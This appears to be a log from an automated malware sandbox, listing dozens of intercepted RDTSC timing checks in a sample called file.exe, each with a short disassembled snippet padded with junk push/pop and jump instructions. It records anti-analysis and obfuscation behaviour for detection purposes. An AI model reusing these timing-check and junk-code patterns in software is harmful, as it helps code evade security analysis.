Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB7B76 second address: CB7B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB7B7C second address: CB7B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC41C7769D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB61E3 second address: CB61F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FC41D10CDDCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB61F5 second address: CB6209 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC41C7769DCh 0x00000008 js 00007FC41C7769D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CBD6C7 second address: CBD6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC41D10CDDFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CBD6DF second address: CBD6E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CBD96B second address: CBD977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC41D10CDD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CBD977 second address: CBD97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CBD97C second address: CBD98A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC41D10CDD8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CBD98A second address: CBD98E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CBF2AD second address: CBF2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CBF2B1 second address: CBF2C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FC41C7769D6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC9FE5 second address: CC9FF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC41D10CDD6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC9FF2 second address: CCA010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC41C7769E7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCA010 second address: CCA01E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D10CDDAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCA01E second address: CCA02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCA02B second address: CCA07A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007FC41D10CDD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007FC41D10CDE7h 0x00000016 popad 0x00000017 jmp 00007FC41D10CDDFh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC41D10CDDFh 0x00000023 jns 00007FC41D10CDD6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCDAD3 second address: CCDAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC41C7769E2h 0x0000000b jne 00007FC41C7769D6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCDAF2 second address: CCDAFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC41D10CDD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCDAFD second address: CCDB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCD567 second address: CCD571 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCD571 second address: CCD57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC41C7769D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCD57B second address: CCD5A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC41D10CDDCh 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC41D10CDDFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCD708 second address: CCD74F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC41C7769DAh 0x00000008 jp 00007FC41C7769D8h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jnl 00007FC41C7769D6h 0x0000001a pushad 0x0000001b popad 0x0000001c jnp 00007FC41C7769D6h 0x00000022 popad 0x00000023 jmp 00007FC41C7769E6h 0x00000028 push eax 0x00000029 push edx 0x0000002a js 00007FC41C7769D6h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCD74F second address: CCD753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CDDE86 second address: CDDE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41C7769E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CDDE9E second address: CDDEB0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC41D10CDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FC41D10CDD8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CDDEB0 second address: CDDEB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CDDD3E second address: CDDD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CDDD42 second address: CDDD54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41C7769DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE1BEA second address: CE1BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE1AAD second address: CE1AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE5CA1 second address: CE5CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC41D10CDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE5CAB second address: CE5CCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1049h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE5CCD second address: CE5D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007FC41D25BAD3h 0x0000000b jmp 00007FC41D25BAD7h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC41D25BAD8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE5FD8 second address: CE5FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE5FDE second address: CE5FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE5FE2 second address: CE604D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC41CBA1036h 0x00000008 jns 00007FC41CBA1036h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FC41CBA1041h 0x00000016 jng 00007FC41CBA1036h 0x0000001c jmp 00007FC41CBA1045h 0x00000021 popad 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 jg 00007FC41CBA1036h 0x0000002e pop ecx 0x0000002f pushad 0x00000030 jng 00007FC41CBA1036h 0x00000036 jmp 00007FC41CBA1047h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE604D second address: CE605E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41D25BACCh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE605E second address: CE6077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC41CBA103Fh 0x00000009 jg 00007FC41CBA1036h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE6077 second address: CE607B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE64A1 second address: CE64A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE64A5 second address: CE6514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D25BACBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FC41D25BAD2h 0x00000017 pop ebx 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FC41D25BACCh 0x00000025 jnp 00007FC41D25BAC6h 0x0000002b jmp 00007FC41D25BAD1h 0x00000030 popad 0x00000031 jmp 00007FC41D25BAD8h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE6514 second address: CE6519 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE665F second address: CE666C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC41D25BAC6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE666C second address: CE6689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1048h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE70F8 second address: CE70FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE70FF second address: CE7112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FC41CBA1052h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CE7112 second address: CE7116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CED048 second address: CED04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECBC8 second address: CECBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECBD1 second address: CECBDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FC41CBA1036h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECBDE second address: CECBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECD09 second address: CECD23 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC41CBA1036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jne 00007FC41CBA1036h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECD23 second address: CECD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41D25BAD5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECD3C second address: CECD5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1047h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECD5B second address: CECD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECD5F second address: CECD63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECD63 second address: CECD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECD6E second address: CECD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CECD74 second address: CECD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF72FB second address: CF7329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CBA1046h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push esi 0x00000010 je 00007FC41CBA1036h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CF7329 second address: CF732D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0ADD4 second address: D0ADED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1043h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0ADED second address: D0ADF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0ADF1 second address: D0AE24 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007FC41CBA1038h 0x0000000f jc 00007FC41CBA1038h 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 jmp 00007FC41CBA1047h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0AE24 second address: D0AE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1AABF second address: D1AAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC41CBA1036h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jns 00007FC41CBA1036h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1AAD2 second address: D1AADD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007FC41D25BAC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1AADD second address: D1AAFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FC41CBA1041h 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC41CBA1036h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1AAFE second address: D1AB1D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC41D25BAC6h 0x00000008 jmp 00007FC41D25BACEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1AC80 second address: D1AC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1AC86 second address: D1AC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1B0FF second address: D1B10C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC41CBA1038h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1CDF8 second address: D1CE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41D25BACDh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1CE0E second address: D1CE18 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC41CBA1036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1F7D8 second address: D1F7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007FC41D25BAC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1F97A second address: D1F993 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC41CBA1041h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1F993 second address: D1F997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1FD24 second address: D1FD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1FD28 second address: D1FD2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D20FC9 second address: D20FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C0CF6E second address: C0CF78 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC41D25BAC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D22785 second address: D227A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CBA1049h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D227A4 second address: D227E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FC41D25BADCh 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FC41D25BAD2h 0x00000017 jg 00007FC41D25BAC6h 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D227E8 second address: D227F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 js 00007FC41CBA105Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D227F8 second address: D22802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC41D25BAC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5420507 second address: 5420524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1049h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5420524 second address: 542052A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 542052A second address: 542052E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 542052E second address: 5420532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5420532 second address: 5420587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FC41CBA103Fh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop esi 0x00000015 pushfd 0x00000016 jmp 00007FC41CBA1047h 0x0000001b sbb ch, 0000000Eh 0x0000001e jmp 00007FC41CBA1049h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5420587 second address: 542058D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542058D second address: 5420591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54205AD second address: 54205B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54205B1 second address: 54205B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
